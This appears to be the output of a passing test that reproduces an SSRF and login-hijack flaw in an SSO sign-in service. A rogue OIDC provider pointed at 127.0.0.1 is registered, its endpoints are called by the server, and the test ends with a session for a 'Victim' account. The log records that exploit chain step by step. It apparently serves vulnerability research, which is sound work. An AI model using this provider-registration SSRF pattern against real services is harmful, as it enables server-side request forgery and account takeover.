RUN  v4.1.10 /data/pruva/project-cache/a937b1f3-9b59-4a11-81fc-750572359892/vuln_variant/vuln stdout | variant-hostname-ssrf.test.ts > SSO SSRF via public-FQDN/private-IP bypass > attempts SSRF via a public-FQDN that resolves to a private IP register response: 200 { "issuer": "http://127.0.0.1:9876", "oidcConfig": { "issuer": "http://127.0.0.1:9876", "clientId": "evil-client", "clientSecret": "evil-secret", "authorizationEndpoint": "http://127.0.0.1:9876/authorize", "tokenEndpoint": "http://127.0.0.1:9876/token", "tokenEndpointAuthentication": "client_secret_basic", "jwksEndpoint": "http://127.0.0.1:9876/jwks", "pkce": true, "discoveryEndpoint": "http://127.0.0.1:9876/.well-known/openid-configuration", "mapping": { "id": "sub", "email": "email", "emailVerified": "email_verified", "name": "name", "image": "picture" }, "userInfoEndpoint": "http://127.0.0.1:9876/userinfo", "overrideUserInfo": false }, "samlConfig": null, "userId": "upRnbZj1kDdLSDVS6gY0H5xYKMHlFHIc", "providerId": "evil-sso", "organizationId": null, "domain": "evil.com", "id": "GJYeqKbAejYOwhkS2UUyK8XeaK0rSOUA", "redirectURI": "http://localhost:3000/api/auth/sso/callback/evil-sso" } stdout | variant-hostname-ssrf.test.ts > SSO SSRF via public-FQDN/private-IP bypass > attempts SSRF via a public-FQDN that resolves to a private IP sign-in response: 200 { "url": "http://127.0.0.1:9876/authorize?response_type=code&client_id=evil-client&state=BuvQ8Ma7XtETpzbuvZDV2X2b2DbGTuan&scope=openid+email+profile+offline_access&redirect_uri=http%3A%2F%2Flocalhost%3A3000%2Fapi%2Fauth%2Fsso%2Fcallback%2Fevil-sso&code_challenge_method=S256&code_challenge=XEVdXmnZu2Sd-QTD55tym54yh5AqnvoxMOg2QNLmDPM", "redirect": true } stdout | variant-hostname-ssrf.test.ts > SSO SSRF via public-FQDN/private-IP bypass > attempts SSRF via a public-FQDN that resolves to a private IP authorize response: 302 location: http://localhost:3000/api/auth/sso/callback/evil-sso?code=attacker-code&state=BuvQ8Ma7XtETpzbuvZDV2X2b2DbGTuan stdout | variant-hostname-ssrf.test.ts > SSO SSRF via public-FQDN/private-IP bypass > attempts SSRF via a public-FQDN that resolves to a private IP callback status: 302 location: /dashboard attacker requests: [ { "method": "GET", "url": "/authorize?response_type=code&client_id=evil-client&state=BuvQ8Ma7XtETpzbuvZDV2X2b2DbGTuan&scope=openid+email+profile+offline_access&redirect_uri=http%3A%2F%2Flocalhost%3A3000%2Fapi%2Fauth%2Fsso%2Fcallback%2Fevil-sso&code_challenge_method=S256&code_challenge=XEVdXmnZu2Sd-QTD55tym54yh5AqnvoxMOg2QNLmDPM", "body": "" }, { "method": "POST", "url": "/token", "body": "grant_type=authorization_code&code=attacker-code&code_verifier=JyJz4zRP0Fpbx1dMxHcGjoC00BBtPHHtbsK83wGgN2hs6mVoPGnUJbPR9H4qaMMZD1z4wiXFcMBc6bRGHC-kEt-yOsR3mzA12CXAGy81n7r1bgPIhR8qxewV7hXl8pvx&redirect_uri=http%3A%2F%2Flocalhost%3A3000%2Fapi%2Fauth%2Fsso%2Fcallback%2Fevil-sso" }, { "method": "GET", "url": "/userinfo", "body": "" } ] stdout | variant-hostname-ssrf.test.ts > SSO SSRF via public-FQDN/private-IP bypass > attempts SSRF via a public-FQDN that resolves to a private IP session: { "session": { "expiresAt": "2026-07-14T23:46:43.743Z", "token": "Xlkn1RcdEa03VOoW5BrcpVDQTJz4yFVY", "createdAt": "2026-07-07T23:46:43.743Z", "updatedAt": "2026-07-07T23:46:43.743Z", "ipAddress": "127.0.0.1", "userAgent": "node", "userId": "dMeVAYdSdLJ5XhPw0WMk8BqBQ6pKTp5A", "id": "RS9IHcadaqBTfAtemCj7x5ZZW9bYDkzW" }, "user": { "name": "Victim", "email": "victim@example.com", "emailVerified": true, "image": null, "createdAt": "2026-07-07T23:46:43.660Z", "updatedAt": "2026-07-07T23:46:43.742Z", "id": "dMeVAYdSdLJ5XhPw0WMk8BqBQ6pKTp5A" } } ✓ variant-hostname-ssrf.test.ts (1 test) 147ms  Test Files  1 passed (1)  Tests  1 passed (1)  Start at  23:46:43  Duration  538ms (transform 19ms, setup 0ms, import 314ms, tests 147ms, environment 0ms)